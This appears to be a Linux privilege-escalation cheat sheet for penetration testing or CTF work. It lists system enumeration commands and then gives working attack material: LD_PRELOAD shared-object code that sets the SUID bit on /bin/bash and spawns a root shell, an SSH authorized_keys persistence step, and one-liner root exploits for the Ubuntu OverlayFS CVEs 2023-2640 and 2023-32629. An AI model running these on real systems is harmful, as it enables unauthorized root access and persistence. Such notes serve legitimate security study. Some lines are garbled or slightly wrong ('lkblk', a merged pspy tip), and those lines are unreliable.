Linux Privilege Escalation
Enum tools
Resources
Enum Basics
Current logged user
whoami
Current user groups
id
Machine's domain name
hostname
OS version
cat /etc/os-release
Kernel version
uname -a
cat /proc/version
Sudo version
sudo -V
Additional host info
lscpu
Network interfaces
ifconfig
ip addr
Routing table
netstat -rn
route
Hostfile
cat /etc/hosts
Arp table (other hosts)
arp -a
Drives and shares
lkblk
Mounts
cat /etc/fstab
Mounted file systems
df -h
Unmounted file systems
cat /etc/fstab | grep -v "#" | column -t
What can we run as root?
sudo -l
Is path misconfigured?
echo $PATH
Environment variables
env
Available shells
cat /etc/shells
Existing users
cat /etc/passwd
Existing groups
cat /etc/group
Which users are in the sudo group?
getent group sudo
Logged users
w
Last user logins
lastlog
Check bash history
history
Cron
crontab -e
ls -la /etc/cron.daily/
Root processes
ps aux | grep root
Find .sh files
find / -type f -name "*.sh" 2>/dev/null | grep -v "src\|snap\|share"
Find .bash_history files
find / -type f \( -name *_hist -o -name *_history \) -exec ls -l {} \; 2>/dev/null
Find configuration files
find / -type f \( -name *.conf -o -name *.config \) -exec ls -l {} \; 2>/dev/null
Find all writable files
find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null
Find all hidden files for user
find / -type f -name ".*" -exec ls -l {} \; 2>/dev/null | grep $USER
Find temporary files
ls -l /tmp /var/tmp /dev/shm
Find all writable directories
find / -path /proc -prune -o -type d -perm -o+w 2>/dev/null
Find all hidden directories
find / -type d -name ".*" -ls 2>/dev/null
Installed packages
apt list --installed | tr "/" " " | cut -d" " -f1,3 | sed 's/[0-9]://g' | tee -a installed_pkgs.list
Things to look for
- Commands that contain credentials like
mysql -ptest123get leaked inps, usepspy - Search for hashes/credentials, often in backups or configs
Misc notes
.so loading
#include <unistd.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("chmod u+s /bin/bash");
system("/bin/bash -i");
}
gcc -fPIC -shared -o extension.so extension.c -nostartfiles
bash -p
ssh private key
# victim
ssh-keygen -t rsa -b 4096
cat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys
# Host
## copy key to host
chmod 600 /path/to/id_rsa_custom
ssh -i /path/to/id_rsa_custom user@target_machine_ip
CVEs
CVE-2023-2640 | CVE-2023-32629
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("id")'
# Or
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*; u/python3 -c 'import os;os.setuid(0);os.system(\"id\")'"